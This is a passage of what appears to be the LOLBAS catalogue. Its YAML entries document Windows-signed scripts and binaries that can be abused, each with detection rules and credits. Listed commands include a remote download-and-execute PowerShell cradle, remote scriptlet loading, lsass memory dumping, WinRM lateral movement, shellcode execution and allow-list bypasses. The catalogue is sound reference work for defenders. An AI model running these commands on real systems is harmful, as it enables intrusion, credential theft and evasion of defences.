Code_Sample: - Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml Resources: - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ Acknowledgement: - Person: modexp ================================================ FILE: yml/OSScripts/CL_LoadAssembly.yml ================================================ --- Name: CL_LoadAssembly.ps1 Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml Resources: - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OSScripts/CL_mutexverifiers.yml ================================================ --- Name: CL_Mutexverifiers.ps1 Description: Proxy execution with CL_Mutexverifiers.ps1 Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess {PATH:.ps1} Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10 Tags: - Execute: PowerShell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml Resources: - Link: https://twitter.com/pabraeken/status/995111125447577600 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: yml/OSScripts/Cl_invocation.yml ================================================ --- Name: CL_Invocation.ps1 Description: Aero diagnostics script Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke {CMD} Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10 Tags: - Execute: CMD Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml Acknowledgement: - Person: Jimmy Handle: '@bohops' - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: yml/OSScripts/Launch-VsDevShell.yml ================================================ --- Name: Launch-VsDevShell.ps1 Description: Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet Author: 'Nasreddine Bencherchali' Created: 2022-06-13 Commands: - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath {PATH_ABSOLUTE:.exe}' Description: Execute binaries from the context of the signed script using the "VsWherePath" flag. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; {PATH:.exe} ;"' Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml Resources: - Link: https://twitter.com/nas_bench/status/1535981653239255040 Acknowledgement: - Person: Nasreddine Bencherchali Handle: '@nas_bench' ================================================ FILE: yml/OSScripts/Manage-bde.yml ================================================ --- Name: Manage-bde.wsf Description: Script for managing BitLocker Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: set comspec={PATH_ABSOLUTE:.exe} & cscript c:\windows\system32\manage-bde.wsf Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. Usecase: Proxy execution from script Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. Usecase: Proxy execution from script Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\manage-bde.wsf Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml - IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations Resources: - Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 - Link: https://twitter.com/bohops/status/980659399495741441 - Link: https://twitter.com/JohnLaTwC/status/1223292479270600706 Acknowledgement: - Person: Jimmy Handle: '@bohops' - Person: Daniel Bohannon Handle: '@danielbohannon' - Person: John Lambert Handle: '@JohnLaTwC' ================================================ FILE: yml/OSScripts/Pubprn.yml ================================================ --- Name: Pubprn.vbs Description: Proxy execution with Pubprn.vbs Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct} Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216.001 OperatingSystem: Windows 10 Tags: - Execute: SCT Full_Path: - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml Resources: - Link: https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - Link: https://github.com/enigma0x3/windows-operating-system-archaeology Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ================================================ FILE: yml/OSScripts/Syncappvpublishingserver.yml ================================================ --- Name: Syncappvpublishingserver.vbs Description: Script used related to app-v and publishing server Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX" Description: Inject PowerShell script code with the provided arguments Usecase: Use Powershell host invoked from vbs script Category: Execute Privileges: User MitreID: T1216.002 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml Resources: - Link: https://twitter.com/monoxgas/status/895045566090010624 - Link: https://twitter.com/subTee/status/855738126882316288 Acknowledgement: - Person: Nick Landers Handle: '@monoxgas' - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OSScripts/UtilityFunctions.yml ================================================ --- Name: UtilityFunctions.ps1 Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml Resources: - Link: https://twitter.com/nickvangilder/status/1441003666274668546 Acknowledgement: - Person: Nick VanGilder Handle: '@nickvangilder' ================================================ FILE: yml/OSScripts/Winrm.yml ================================================ --- Name: winrm.vbs Description: Script used for manage Windows RM settings Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="{CMD}"} -r:http://target:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Execute: Remote - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="{CMD}"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution Category: Execute Privileges: Admin MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Execute: Remote - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe. Usecase: Execute arbitrary, unsigned code via XSL script Category: AWL Bypass Privileges: User MitreID: T1220 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: XSL Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - Link: https://www.youtube.com/watch?v=3gz1QmiMhss - Link: https://github.com/enigma0x3/windows-operating-system-archaeology - Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/ - Link: https://twitter.com/bohops/status/994405551751815170 - Link: https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 - Link: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' - Person: Matt Nelson Handle: '@enigma0x3' - Person: Casey Smith Handle: '@subtee' - Person: Jimmy Handle: '@bohops' - Person: Red Canary Company cc Tony Lambert Handle: '@redcanaryco' ================================================ FILE: yml/OSScripts/pester.yml ================================================ --- Name: Pester.bat Description: Used as part of the Powershell pester Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Pester.bat [/help|?|-?|/?] "$null; {CMD}" Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: Pester.bat ;{PATH:.exe} Description: Execute code using Pester. Example here executes specified executable. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml Resources: - Link: https://twitter.com/Oddvarmoe/status/993383596244258816 - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378 - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378 Acknowledgement: - Person: Emin Atac Handle: '@p0w3rsh3ll' - Person: Stamatis Chatzimangou Handle: '@_st0pp3r_' ================================================ FILE: yml/OtherMSBinaries/AccCheckConsole.yml ================================================ --- Name: AccCheckConsole.exe Description: Verifies UI accessibility requirements Author: bohops Created: 2022-01-02 Commands: - Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll} Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code from assembly DLL. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: DLL (.NET) - Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll} Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: DLL (.NET) Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm64\AccChecker\AccCheckConsole.exe Code_Sample: - Code: https://docs.microsoft.com/en-us/windows/win32/winauto/custom-verification-routines Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml - IOC: Sysmon Event ID 1 - Process Creation - Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 Resources: - Link: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 - Link: https://twitter.com/bohops/status/1477717351017680899 Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OtherMSBinaries/Adplus.yml ================================================ --- Name: adplus.exe Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 2021-09-01 Commands: - Command: adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet Description: Creates a memory dump of the lsass process Usecase: Create memory dump and parse it offline Category: Dump Privileges: SYSTEM MitreID: T1003.001 OperatingSystem: All Windows - Command: adplus.exe -c {PATH:.xml} Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 OperatingSystem: All Windows Tags: - Execute: CMD - Command: adplus.exe -c {PATH:.xml} Description: Dump process memory using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Dump Privileges: SYSTEM MitreID: T1003.001 OperatingSystem: All Windows - Command: adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe} Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required. Usecase: Run commands under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 OperatingSystem: All windows Tags: - Execute: CMD - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe Code_Sample: - Code: https://gist.github.com/nasbench/e34ca2cd90e3a845a558a102a4f607da Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml - IOC: As a Windows SDK binary, execution on a system may be suspicious Resources: - Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/ - Link: https://twitter.com/nas_bench/status/1534916659676422152 - Link: https://twitter.com/nas_bench/status/1534915321856917506 Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' - Person: Nasreddine Bencherchali Handle: '@nas_bench' ================================================ FILE: yml/OtherMSBinaries/Agentexecutor.yml ================================================ --- Name: AgentExecutor.exe Description: Intune Management Extension included on Intune Managed Devices Author: Eleftherios Panos Created: 2020-07-23 Commands: - Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1 Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument Usecase: Execute unsigned powershell scripts Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 Tags: - Execute: PowerShell - Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "{PATH_ABSOLUTE:folder}" 0 1 Description: If we place a binary named powershell.exe in the specified folder path, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 Tags: - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml Acknowledgement: - Person: Eleftherios Panos Handle: '@lefterispan' ================================================ FILE: yml/OtherMSBinaries/AppLauncher.yml ================================================ --- Name: AppLauncher.exe Description: User Experience Virtualization tool that launches applications under monitoring to capture and synchronize user settings. Author: Avihay Eldad Created: 2025-09-21 Commands: - Command: AppLauncher.exe {PATH_ABSOLUTE:.exe} Description: Launches an executable via User Experience Virtualization tool. Usecase: Executes an executable under a trusted, Microsoft signed binary. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE Full_Path: - Path: C:\Program Files\Windows Kits\10\Microsoft User Experience Virtualization\Management\AppLauncher.exe - Path: C:\Program Files (x86)\Windows Kits\10\Microsoft User Experience Virtualization\Management\AppLauncher.exe Resources: - Link: https://learn.microsoft.com/en-us/microsoft-desktop-optimization-pack/ue-v/uev-getting-started Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Appcert.yml ================================================ --- Name: AppCert.exe Description: Windows App Certification Kit command-line tool. Author: Avihay Eldad Created: 2024-03-06 Commands: - Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml} Description: Execute an executable file via the Windows App Certification Kit command-line tool. Usecase: Performs execution of specified file, can be used as a defense evasion Category: Execute Privileges: Administrator MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml} Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process. Usecase: Execute custom made MSI file with malicious code Category: Execute Privileges: Administrator MitreID: T1218.007 OperatingSystem: Windows Tags: - Execute: MSI Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe - Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe Resources: - Link: https://learn.microsoft.com/windows/win32/win_cert/using-the-windows-app-certification-kit Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Appvlp.yml ================================================ --- Name: Appvlp.exe Description: Application Virtualization Utility Included with Microsoft Office 2016 Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: AppVLP.exe {PATH_SMB:.bat} Usecase: Execution of BAT file hosted on Webdav server. Description: Executes .bat file through AppVLP.exe Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 Tags: - Execute: CMD - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 Tags: - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml Resources: - Link: https://github.com/MoooKitty/Code-Execution - Link: https://twitter.com/moo_hax/status/892388990686347264 - Link: https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/ - Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/ Acknowledgement: - Person: fab Handle: '@0rbz_' - Person: Will Handle: '@moo_hax' - Person: Matt Wilson Handle: '@enigma0x3' ================================================ FILE: yml/OtherMSBinaries/Bcp.yml ================================================ --- Name: Bcp.exe Description: Microsoft SQL Server Bulk Copy Program utility for importing and exporting data between SQL Server instances and data files. Author: Mahir Ali Khan Created: 2025-11-13 Commands: - Command: bcp "SELECT payload_data FROM database.dbo.payloads WHERE id=1" queryout "C:\Windows\Temp\payload.exe" -S localhost -T -c Description: Export binary payload stored in SQL Server database to file system. Usecase: Extract malicious executable from database storage to local file system for execution. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Full_Path: - Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe - Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe - Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\bcp.exe - Path: C:\Program Files (x86)\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe - Path: C:\Program Files (x86)\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe - Path: C:\Program Files (x86)\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\bcp.exe - Path: C:\Program Files (x86)\Microsoft SQL Server\120\Tools\Binn\bcp.exe Detection: - IOC: Process creation of bcp.exe with queryout or Out parameter - IOC: bcp.exe writing executable files to temp or users directories - IOC: Network connections from bcp.exe to SQL Server followed by file creation - IOC: Event ID 4688 - Process creation for bcp.exe - IOC: Event ID 4663 - File system access by bcp.exe - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_bcp_export_data.yml Resources: - Link: https://docs.microsoft.com/en-us/sql/tools/bcp-utility - Link: https://asec.ahnlab.com/en/61000/ - Link: https://asec.ahnlab.com/en/78944/ - Link: https://www.huntress.com/blog/attacking-mssql-servers - Link: https://www.huntress.com/blog/attacking-mssql-servers-pt-ii - Link: https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/ - Link: https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ Acknowledgement: - Person: Mahir Ali Khan Handle: '@mahiralikhan07' ================================================ FILE: yml/OtherMSBinaries/Bginfo.yml ================================================ --- Name: Bginfo.exe Description: Background Information Utility included with SysInternals Suite Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt Description: Execute VBscript code that is referenced within the specified .bgi file. Usecase: Local execution of VBScript Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: WSH - Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt Description: Execute VBscript code that is referenced within the specified .bgi file. Usecase: Local execution of VBScript Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: WSH - Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. Category: Execute Privileges: User MitreID: T1218 Tags: - Execute: WSH OperatingSystem: Windows - Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: WSH - Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: WSH - Execute: Remote - Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: WSH - Execute: Remote Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OtherMSBinaries/Cdb.yml ================================================ --- Name: Cdb.exe Description: Debugging tool included with Windows Debugging Tools. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: cdb.exe -cf {PATH:.wds} -o notepad.exe Description: Launch 64-bit shellcode from the specified .wds file using cdb.exe. Usecase: Local execution of assembly shellcode. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: Shellcode - Command: | cdb.exe -pd -pn {process_name} .shell {CMD} Description: Attaching to any process and executing shell commands. Usecase: Run a shell command under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CMD - Command: cdb.exe -c {PATH:.txt} "{CMD}" Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Execute 